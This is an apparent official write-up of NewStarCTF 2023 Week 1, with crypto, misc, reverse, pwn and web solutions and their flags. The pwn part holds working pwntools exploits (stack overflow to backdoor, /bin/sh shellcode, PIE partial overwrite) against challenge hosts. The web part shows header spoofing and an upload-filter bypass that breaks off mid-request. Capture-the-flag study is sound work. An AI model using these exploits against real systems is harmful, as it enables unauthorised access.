[NewStarCTF2023]Week1
[NewstarCTF2023]Week1_Official
Crypto
Caesar's Secert
flag
flag{ca3s4r's_c1pher_i5_v4ry_3azy}
Fence
flag
flag{reordering_the_plaintext#686f8c03}
brainfuck
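def shrinkBFCode(code):
    """Collapse runs of '+'/'-' in brainfuck source into single '+' tokens.

    Pointer moves ('>'/'<') are not emitted at all; they are folded into a
    running cell index, so every emitted token is annotated with the cell it
    operates on. Any other character (including this writeup's custom '%' op)
    is passed through unchanged.

    :param code: brainfuck source string
    :return: (shrunk code,
              {emitted token index: cell index},
              {emitted '+' token index: net change of the collapsed run})
    """
    cPos2Vars = {}    # emitted token index -> cell index it operates on
    cPos2Change = {}  # emitted '+' token index -> net increment of the run
    varPos = 0        # current data-pointer position
    nCode = []
    incVal = 0        # net +/- change accumulated for the current run
    dataChangeOp = {'+', '-'}

    def flush_run():
        # Emit one '+' carrying the accumulated net change of a '+'/'-' run.
        nonlocal incVal
        cPos2Change[len(nCode)] = incVal
        cPos2Vars[len(nCode)] = varPos
        nCode.append('+')
        incVal = 0

    lc = None
    for c in code:
        if c not in dataChangeOp and lc in dataChangeOp:
            flush_run()
        if c == '>':
            varPos += 1
        elif c == '<':
            varPos -= 1
        elif c in dataChangeOp:
            incVal += 1 if c == '+' else -1
        else:
            cPos2Vars[len(nCode)] = varPos
            nCode.append(c)
        lc = c
    # A run of '+'/'-' at the very end of the source has no following token
    # to trigger the flush, so emit it explicitly instead of dropping it.
    if lc in dataChangeOp:
        flush_run()
    return ''.join(nCode), cPos2Vars, cPos2Change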
def generatePyCode(shellCode, pVars, pChange):
    """Translate shrunk brainfuck (output of shrinkBFCode) into Python source.

    Every emitted statement operates on ``data[<cell>]``. A ``[ + ]`` loop with
    a single collapsed change is rewritten as a cell clear, a flat loop (no
    nested '[' and no '%') is rewritten as multiply-add statements driven by
    the loop counter, and anything else becomes a ``while data[x] != 0:`` loop.
    The generated code expects ``data`` and ``stdin`` to be provided by whoever
    runs it.

    :param shellCode: shrunk token string from shrinkBFCode
    :param pVars: {token index: cell index} from shrinkBFCode
    :param pChange: {token index of '+': net change} from shrinkBFCode
    :return: generated Python source, one statement per line
    :raises Exception: on a ']' whose matching opener on the stack is not '['
    """
    pyCodes = []
    bStacks = []          # stack of open loops as ('[', token index)
    whileVarCache = {}    # '[' token index -> {cell: net change inside that loop}
    for i, c in enumerate(shellCode):
        d_pos = i if i not in pVars else pVars[i]
        d_change = 1 if i not in pChange else pChange[i]
        indentLevel = len(bStacks)
        indentStr = ' '*(4*indentLevel)
        if c == '[':
            pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
            bStacks.append((c, i))
            whileVarCache[i] = {}
        elif c == ']':
            if bStacks[-1][0] != '[':
                raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
            cNum = i-bStacks[-1][1]
            if cNum == 2:
                # Exactly one token between '[' and ']': assumed to be a collapsed
                # '+' (i.e. the classic [-] idiom), so the loop just clears the cell.
                del pyCodes[-1]
                del pyCodes[-1]
                d_pos_l = i-1 if i-1 not in pVars else pVars[i-1]
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            whileCode = shellCode[bStacks[-1][1]+1 : i]
            if cNum>2 and '[' not in whileCode and not '%' in whileCode: # nested loop is a bit complicated, just skip
                # Flat loop: the body only changes cells, so each touched cell ends
                # up changed by (its per-iteration delta / counter delta) * counter.
                loopCondvar = bStacks[-1][1]
                d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar]
                whileVars = whileVarCache[bStacks[-1][1]]
                cVarChange = whileVars[d_pos_l]   # KeyError if the body never touches the counter cell
                # remove statement of same indent
                while len(pyCodes)>0 and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)]!=' ':
                    pyCodes.pop()
                pyCodes.pop()   # the 'while' header itself
                #del pyCodes[bStacks[-1][1]-i:]
                for vPos, vChange in whileVars.items():
                    if vPos == d_pos_l:
                        continue
                    # True division: the factor is emitted as a float ('2.0*'), which
                    # is why the writeup's output needs a small manual fix-up.
                    ctimes = abs(vChange / cVarChange)
                    ctimesStr = '' if ctimes==1 else '{}*'.format(ctimes)
                    cSign = '+' if vChange > 0 else '-'
                    pyCodes.append('{}data[{}] {}= {}data[{}]'.format(' '*(4*(indentLevel-1)),
                                   vPos, cSign, ctimesStr, d_pos_l))
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            del whileVarCache[bStacks[-1][1]]
            bStacks.pop()
        elif c == '.':
            pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
        elif c == ',':
            pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
        elif c == '+':
            opSign = '-=' if d_change < 0 else '+='
            # Merge 'data[x] = 0' immediately followed by a change into 'data[x] = n'.
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                # Record the per-iteration delta for the innermost open loop.
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] += d_change
        elif c == '-':
            # shrinkBFCode never emits '-', but keep the branch for un-shrunk input.
            opSign = '+=' if d_change < 0 else '-='
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, -d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] -= d_change
        elif c == '%':
            # Non-standard op used by this challenge: cell %= next cell.
            pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos+1))
    return '\n'.join(pyCodes)
# The challenge's brainfuck program: collapse it, lift it to Python and print the result.
shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++."
shrinkCode, pVars, pChange = shrinkBFCode(shellcode)
print(generatePyCode(shrinkCode, pVars, pChange))
解密得到
# Output of generatePyCode() for the challenge program. To run it, bind `data`
# to a zero-filled list of at least 17 ints (cells 0..16 are used) and print
# chr() of each value instead of the raw number; the '2.0*' factors are
# integer multipliers written as floats by the generator's true division.
data[0] += 8
data[2] += 2.0*data[0]
data[3] += 4.0*data[0]
data[4] += 6.0*data[0]
data[5] += 8.0*data[0]
data[6] += 10.0*data[0]
data[7] += 12.0*data[0]
data[8] += 14.0*data[0]
data[9] += 16.0*data[0]
data[10] += 18.0*data[0]
data[11] += 20.0*data[0]
data[12] += 22.0*data[0]
data[13] += 24.0*data[0]
data[14] += 26.0*data[0]
data[15] += 28.0*data[0]
data[16] += 30.0*data[0]
data[0] = 0
data[7] += 6
print(data[7])
data[8] -= 4
print(data[8])
data[7] -= 5
print(data[7])
data[8] -= 5
print(data[8])
data[9] -= 5
print(data[9])
data[6] -= 1
print(data[6])
data[8] += 2
print(data[8])
print(data[8])
print(data[7])
print(data[8])
data[8] += 6
print(data[8])
print(data[8])
print(data[8])
print(data[8])
print(data[8])
data[8] -= 6
print(data[8])
print(data[7])
print(data[8])
data[3] += 3
print(data[3])
data[7] += 1
print(data[7])
data[4] += 7
print(data[4])
data[7] += 1
print(data[7])
data[4] -= 7
print(data[4])
data[7] -= 1
print(data[7])
data[4] += 1
print(data[4])
data[4] += 7
print(data[4])
data[4] -= 2
print(data[4])
print(data[4])
data[8] -= 3
print(data[8])
data[8] -= 1
print(data[8])
data[4] -= 1
print(data[4])
data[4] += 3
print(data[4])
print(data[8])
data[4] -= 7
print(data[4])
data[4] += 1
print(data[4])
data[9] += 2
print(data[9])
简单修改一下输出得到
或者CTF在线工具
flag
flag{Oiiaioooooiai#b7c0b1866fe58e12}
Vigenère
flag
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
babyrsa
from Crypto.Util.number import *
import binascii
import gmpy2
import rsa
from factordb.factordb import FactorDB
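n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
# Look n up on factordb.com (network access required); this only succeeds when
# the modulus has already been factored there, i.e. it was weak to begin with.
a = FactorDB(n)
a.connect()
fac = a.get_factor_list()
# Euler's totient from the factor list. This assumes the factors are distinct
# primes (square-free n); a repeated factor would make phi_n wrong.
phi_n = 1
for i in fac:
    phi_n *= (i-1)
d = gmpy2.invert(e, phi_n)
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
m = gmpy2.powmod(c, d, n)
# Convert with an explicit byte length: unhexlify(hex(m)[2:]) raises on an
# odd-length hex string, i.e. whenever the top byte of m is below 0x10.
m = int(m)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))
#flag{us4_s1ge_t0_cal_phI}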
flag
flag{us4_s1ge_t0_cal_phI}
babyxor
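enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher_hex = list(bytes.fromhex(enc))
#print(cipher_hex)
# Single-byte XOR: every key value 0..255 is a candidate, so the search must
# cover range(256); range(255) would never try key 255.
for key in range(256):
    flag = ''.join(chr(c ^ key) for c in cipher_hex)
    #print(flag)
    if 'flag' in flag:
        print(f'key={key}\n{flag}')
        break
#flag{x0r_15_symm3try_and_e4zy!!!!!!}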
flag
flag{x0r_15_symm3try_and_e4zy!!!!!!}
small d
n,e都很大,直接考虑维纳攻击
github上找个脚本
import math

import gmpy2
import libnum
def continuedFra(x, y):
    """Return the continued-fraction expansion of x/y as a list of partial quotients.

    :param x: numerator
    :param y: denominator
    :return: list of partial quotients (empty when y == 0)
    """
    quotients = []
    while y != 0:
        q, r = divmod(x, y)
        quotients.append(q)
        x, y = y, r
    return quotients
def gradualFra(cf):
    """Return the last convergent of the continued fraction cf.

    The pair is returned as (denominator, numerator): for cf = [1, 2, 2, 2]
    (the expansion of 17/12) the result is (12, 17).

    :param cf: list of partial quotients
    :return: (denominator, numerator) of the final convergent
    """
    den_acc, num_acc = 0, 1
    # Fold from the last quotient back to the first (backward substitution).
    for quotient in reversed(cf):
        den_acc, num_acc = num_acc, quotient * num_acc + den_acc
    return den_acc, num_acc
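def solve_pq(a, b, c):
    """Solve a*x^2 + b*x + c = 0 over the integers (Vieta: x^2 - (p+q)x + pq = 0).

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (p*q)
    :return: the two roots (p, q). They are exact only when the discriminant
             is a perfect square, so callers must verify p*q == c.
    :raises ValueError: if the discriminant is negative
    """
    # math.isqrt is exact on arbitrary-size ints, so no gmpy2 needed here.
    root = math.isqrt(b * b - 4 * a * c)
    return (-b + root) // (2 * a), (-b - root) // (2 * a)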
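def getGradualFra(cf):
    """Return every convergent of cf, in order, as (denominator, numerator) pairs.

    Equivalent to [gradualFra(cf[:i]) for i in range(1, len(cf) + 1)] but
    computed in one pass with the standard recurrence
    h_i = a_i*h_{i-1} + h_{i-2}, k_i = a_i*k_{i-1} + k_{i-2}
    (h numerators, k denominators), i.e. O(n) instead of O(n^2).

    :param cf: list of partial quotients
    :return: list of (denominator, numerator) pairs, one per prefix of cf
    """
    h_prev, h = 0, 1   # h_{-2}, h_{-1}
    k_prev, k = 1, 0   # k_{-2}, k_{-1}
    convergents = []
    for quotient in cf:
        h_prev, h = h, quotient * h + h_prev
        k_prev, k = k, quotient * k + k_prev
        convergents.append((k, h))
    return convergents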
def wienerAttack(e, n):
    """Wiener's attack: recover a small private exponent d from the public key (e, n).

    Each convergent of e/n is a candidate k/d. When k divides e*d - 1,
    phi = (e*d - 1)/k; p and q are then the roots of x^2 - (n - phi + 1)x + n,
    and d is accepted as soon as p*q == n.

    :param e: public exponent
    :param n: modulus
    :return: the private exponent d, or None when no convergent works
    """
    for d, k in getGradualFra(continuedFra(e, n)):
        if k == 0 or (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d
    return None
# Challenge parameters: e is about as large as n, the usual sign of a small d.
n= 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e= 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
c= 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
d=wienerAttack(e, n)   # None if no convergent worked; pow() below then raises TypeError
m=pow(c, d, n)
print(libnum.n2s(m).decode())
#flag{learn_some_continued_fraction_technique#dc16885c}
flag
flag{learn_some_continued_fraction_technique#dc16885c}
babyencoding
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`
part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
flag
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
Affine
仿射密码
def egcd(a, b):
    """Extended Euclid: return (g, x, y) with g = gcd(a, b) and a*x + b*y == g."""
    if a == 0:
        return (b, 0, 1)
    quotient, remainder = divmod(b, a)
    g, y_prev, x_prev = egcd(remainder, a)
    # Back-substitute the coefficients found for (b mod a, a) into (a, b).
    return (g, x_prev - quotient * y_prev, y_prev)
def modinv(a, m):
    """Return the inverse of a modulo m.

    :raises Exception: when gcd(a, m) != 1, i.e. no inverse exists
    """
    g, x, _ = egcd(a, m)
    if g == 1:
        return x % m
    raise Exception('modular inverse does not exist')
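modulus = 256
enc = bytes.fromhex(
    'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
#print(enc)
# Brute-force the affine key (key_0, key_1) over all 256*256 pairs:
# plaintext = key_0^-1 * (ciphertext - key_1) mod 256, so only key_0 values
# coprime to 256 (odd ones) have an inverse and are worth trying.
for key_0 in range(256):
    try:
        inv_key_0 = modinv(key_0, modulus)
    except Exception:
        # modinv raises a plain Exception for non-invertible key_0; catching
        # Exception (not a bare except) keeps Ctrl-C and SystemExit working.
        continue
    for key_1 in range(256):
        decrypted = bytes([(inv_key_0 * (c - key_1)) % modulus for c in enc])
        if b'flag{' in decrypted:
            print("Key found:", key_0, key_1)
            print("Decrypted flag:", decrypted)
#Key found: 17 23
#Decrypted flag: b'flag{4ff1ne_c1pher_i5_very_3azy}'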
flag
flag{4ff1ne_c1pher_i5_very_3azy}
babyaes
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *
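def pad(data):
    """Right-pad *data* with NUL bytes to an AES block boundary.

    Inputs shorter than 16 bytes are padded to exactly 16 (the empty input
    becomes one all-zero block); inputs already a multiple of 16 are returned
    unchanged; longer inputs are padded up to the next multiple of 16 rather
    than passed through unpadded, which AES-CBC would reject.

    NUL padding is not reversible in general: a plaintext that itself ends in
    b'\\x00' cannot be unpadded reliably (the writeup strips the trailing
    zeros by eye).
    """
    if len(data) < 16:
        pad_len = 16 - len(data)
    else:
        pad_len = (-len(data)) % 16
    return data + b'\x00' * pad_len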
def main():
    """Encrypt the padded flag with AES-CBC and print the key/iv leak plus the ciphertext.

    Weaknesses that the solver relies on: the 32-byte key is the same 16
    random bytes repeated (128 bits of entropy for a 256-bit key), and the
    printed value key ^ iv ^ 1 exposes the upper 16 bytes of the key verbatim,
    because the 16-byte iv only covers the low 128 bits of the XOR.
    """
    flag_ = pad(flag)
    key = os.urandom(16) * 2   # 32 bytes, but only 16 of them are random
    iv = os.urandom(16)
    # Leaks key and iv together; high 128 bits of the XOR are the key half unchanged.
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    aes = AES.new(key, AES.MODE_CBC, iv)
    enc_flag = aes.encrypt(flag_)
    print(enc_flag)
if __name__ == "__main__":
    main()   # only when run as a script, not when imported
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
搓个脚本
from Crypto.Cipher import AES
from Crypto.Util.number import *
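a = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
# Undo the "^ 1" the challenge applied, then view the 256-bit value as bytes.
a = a ^ 1
leaked = a.to_bytes(32, 'big')
print(leaked)
# key = K || K (os.urandom(16) * 2) while iv is only 16 bytes, so the high
# 16 bytes of key ^ iv are K untouched and the low 16 bytes are K ^ iv.
# Deriving both halves here avoids copying intermediate bytes by hand.
k_half = leaked[:16]
key = k_half * 2
iv = bytes(x ^ y for x, y in zip(leaked[16:], k_half))
print(iv)
aes = AES.new(key, AES.MODE_CBC, iv)
dec_flag = aes.decrypt(enc)
print(dec_flag)
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
#b'firsT_cry_Aes\x00\x00\x00'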
flag
flag{firsT_cry_Aes}
Misc
CyberChef's Secret
flag
flag{Base_15_S0_Easy_^_^}
空白格
flag
flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}
机密图片
扫码的结果不对,应该有隐写
运用工具StegSolver
flag
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}
隐秘的眼睛
SilentEye直接梭
flag
flag{R0ck1ng_y0u_63b0dc13a591}
流量!鲨鱼!
wireshark打开,大略看一下http,200 OK包很可疑
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64,base64一次看到熟悉的Zmxh,就猜到要再base64一次
flag
flag{Wri35h4rk_1s_u53ful_b72a609537e6}
压缩包们
修复文件头,修复成功后后缀名改成.zip解压
flag.zip提示损坏
继续修复
或者你如果是高贵的bandizip pro用户
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
应该是提示flag.zip的解压密码是六位数字,密码232311
flag
flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}
Reverse
easy_RE
flag
flag{welc0me_to_rev3rse!!}
Segments
shift+F7
手动过滤一下,修改格式得到flag
flag
flag{You_ar3_g0od_at_f1nding_ELF_segments_name}
咳
upx -d 脱壳
exp
enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
# Every character was shifted up by one code point; shift each back down.
flag = ''.join(chr(ord(ch) - 1) for ch in enc)
print(flag)
flag
flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}
ELF
encode加密完标准base64
先把密文base64解码成hex
exp
enc = [0x56, 0x5c, 0x51, 0x57, 0x6b, 0x74, 0x20, 0x8f, 0x24, 0x5f,
       0x65, 0x8f, 0x27, 0x5e, 0x5f, 0x67, 0x8f, 0x67, 0x58, 0x51,
       0x27, 0x8f, 0x75, 0x7c, 0x76, 0x8f, 0x21, 0x63, 0x2f, 0x6d]
# Undo the binary's encoding: subtract 16, then XOR with 0x20
# ('-' binds tighter than '^', so the parentheses only make that explicit).
flag = ''.join(chr((byte - 16) ^ 0x20) for byte in enc)
print(flag)
#flag{D0_4ou_7now_wha7_ELF_1s?}
flag
flag{D0_4ou_7now_wha7_ELF_1s?}
AndroXor
jadx打开,循环异或
exp
enc = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
key = 'happyx3'
key_ascii = [ord(char) for char in key]
# The dump from jadx mixes raw ints and one-character strings, so normalise
# each element to an int before XORing it with the repeating key.
flag = ''.join(
    chr((value if isinstance(value, int) else ord(value)) ^ key_ascii[i % len(key_ascii)])
    for i, value in enumerate(enc)
)
print(flag)
#flag{3z_And0r1d_X0r_x1x1}
flag
flag{3z_And0r1d_X0r_x1x1}
Endian
还是循环异或,因为小端序,所以异或因子是[0x78,0x56,0x34,0x12]
shift+E提取出array
exp
enc = [
    0x1E, 0x3A, 0x55, 0x75, 0x03, 0x3A, 0x58, 0x7B, 0x0C, 0x22,
    0x58, 0x4D, 0x3D, 0x38, 0x50, 0x7B, 0x19, 0x38, 0x6B, 0x73,
    0x05]
# The 32-bit constant 0x12345678 as it sits in memory on a little-endian
# machine, i.e. the byte order the loop actually XORs with.
key = [0x78,0x56,0x34,0x12]
flag = ''.join(chr(value ^ key[idx % len(key)]) for idx, value in enumerate(enc))
print(flag)
#flag{llittl_Endian_a}
flag
flag{llittl_Endian_a}
lazy_activity
非预期
正常解法
jadx打开有个flagactivity进程应该是点10000次出flag
打开模拟器app内提示'Where is my flag? Try to start another Activity.'
那就利用模拟器的adb工具
adb shell
su
am start -n com.droidlearn.activity_travel/.FlagActivity
模拟器弹出这个界面
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本
import pyautogui as pd
import time
pd.FAILSAFE = True   # moving the cursor into a screen corner aborts the click storm
time.sleep(3)
# 3 seconds to move the cursor onto the target position yourself
pd.click(clicks=100000,interval=0.0001)   # 100000 clicks, 0.1 ms apart, at the current position
# pyautogui.click()
# (100,100, clicks=2,interval=0.5,button=‘right’,duration=0.2)
# position, click count, interval, right button (default is left), move duration
flag
flag{Act1v1ty_!s_so00oo0o_Impor#an#}
EzPE
打不开,头文件被修改了
随便找个exe文件复制过来fix一下
简单的异或
exp
enc = [
    0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C,
    0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51,
    0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04,
    0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]
# Each byte was XORed with its index and the *plaintext* byte after it; the
# last byte is untouched, so walk from the second-to-last index down to 0,
# always using the already-decoded neighbour.
last_idx = len(enc) - 2
for idx in range(last_idx, -1, -1):
    enc[idx] ^= idx ^ enc[idx + 1]
flag = ''.join(map(chr, enc))
print(flag)
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
flag
flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
PWN
ret2text
栈溢出
exp
from pwn import *
# Connect to the challenge instance and redirect execution to the binary's
# own 'backdoor' function (assumes a non-PIE build, otherwise elf.symbols
# only gives an offset).
p=remote("node4.buuoj.cn",25617)
elf = ELF ('./ret2text')
backdoor = elf.symbols['backdoor']
# 40 bytes of filler reach the saved return address (offset taken from the
# writeup's analysis, not re-derived here); a stack canary in the build
# would break this fixed layout.
payload = b'a'*40+p64(backdoor)
p.sendline(payload)
p.interactive()
newstar_shop
看附件知道是个整型溢出
shop里面的money是unsigned int(无符号整数),但是don't choose里面的money是int(有符号整数),因此可以整数溢出,让它成为负数再返回购买。
依次输入1212313
ezshellcode
有个read
看看buf
直接传'\x90' 全nop
from pwn import *
banary = "./ezshellcode"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 25641
local = 0   # 1 = run the binary locally, 0 = talk to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')
# A 16-byte NOP sled followed by pwntools' generated /bin/sh shellcode; this
# presumably only works because the buffer read() fills is executable (NX off).
sh = shellcraft.sh()
payload = b'\x90'*(0x8+8) + asm(sh)
io.send(payload)
io.interactive()
random
有个随机数,直接调用
from pwn import *
banary = "./pwn"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26831
local = 0   # 1 = run the binary locally, 0 = talk to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')
# The target presumably seeds libc's rand() with the current time, so
# seeding the same libc the same way here reproduces its "random" number;
# this requires both clocks to agree to the second.
clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
clibc.srand(clibc.time(0))   # ctypes returns time(0) as a 32-bit int by default; fine until 2038
io.sendlineafter("number?\n",str(clibc.rand()))
io.interactive()
pieee
PIE保护
看看buf在栈中位置
传完buf 0x28个后直接跳到0x6c
from pwn import *
banary = "./pie"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26955
local = 0   # 1 = run the binary locally, 0 = talk to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)
context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')
# PIE is on, so absolute addresses are unknown; the payload overwrites only
# the lowest byte of the saved return address (0x6c per the writeup). That
# works because page-granular randomisation leaves the low 12 bits fixed.
payload = b'a'*(0x28)+b'\x6c'
io.send(payload)
io.interactive()
web
ErrorFlask
随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
flag
flag{Y0u_@re_3enset1ve_4bout_deb8g}
Begin of HTTP
提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
提示用post 传 secret
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
post 传一下
改一下cookie,改成ctfer
改 User-Agent 为 NewStarCTF2023
改Referer为 newstarctf.com
最后改一下请求头
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28821
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:28821
Content-Type: application/x-www-form-urlencoded
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: newstarctf.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Connection: close
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000d
泄露的秘密
找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txt
和index.php
PART ONE: flag{r0bots_1s_s0_us3ful
<?php
// index.php as recovered from the exposed www.zip: the second half of the flag
// is a plain string literal, so anyone who can download the archive reads it.
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";
flag
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
Begin of Upload
前端有文件后缀名检测
直接在包中修改后缀名
POST / HTTP/1.1
Host: 56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
